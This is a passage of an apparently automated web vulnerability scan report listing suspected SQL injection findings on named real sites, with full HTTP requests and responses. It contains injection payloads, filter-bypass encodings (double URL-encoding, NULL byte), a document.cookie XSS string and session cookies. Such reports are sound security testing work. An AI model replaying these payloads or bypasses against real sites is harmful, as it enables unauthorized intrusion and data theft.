Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:10 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.27. http://tap.rubiconproject.com/oz/sensor [pc parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The pc parameter appears to be vulnerable to SQL injection attacks. The payloads 20312360'%20or%201%3d1--%20 and 20312360'%20or%201%3d2--%20 were each submitted in the pc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d1--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d2--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.28. http://tr.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tr.imlive.com
Path:	/waccess/

Issue detail

Remediation detail

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.29. http://tr.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tr.imlive.com
Path:	/waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:31:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 8250
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.30. http://twitter.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://twitter.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225134-78066-61608
ETag: "d607d45a9b9b35bf9e842e32301673c1"
Last-Modified: Fri, 28 Jan 2011 14:32:14 GMT
X-Runtime: 0.00992
Content-Type: text/html; charset=utf-8
Content-Length: 44338
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/114763578/logoStackedBlack_normal.jpg" style="vertical-align:middle" width="48" />
...[SNIP]...

Request 2

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225135-14261-45141
ETag: "9605f681076d2ce0929285f2a3ef830b"
Last-Modified: Fri, 28 Jan 2011 14:32:15 GMT
X-Runtime: 0.01078
Content-Type: text/html; charset=utf-8
Content-Length: 44355
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.31. http://twitter.com/ [original_referer cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://twitter.com
Path:	/

Issue detail

The original_referer cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the original_referer cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa'; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234419-42681-53710
ETag: "f792bef31a7a2a529a063813c45d5cab"
Last-Modified: Fri, 28 Jan 2011 17:06:59 GMT
X-Runtime: 0.05064
Content-Type: text/html; charset=utf-8
Content-Length: 45230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div class="hc-tweet-text">says when you give your permission to succeed, you can deny that you gave yourself that permission later when you fail.</div>
...[SNIP]...

Request 2

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa''; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234420-50746-44456
ETag: "8e7d3220e37789a7d94eb127863bf8c4"
Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT
X-Runtime: 0.04397
Content-Type: text/html; charset=utf-8
Content-Length: 45014
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/cambridge/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 451
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/mass_pike/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quasi_state/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
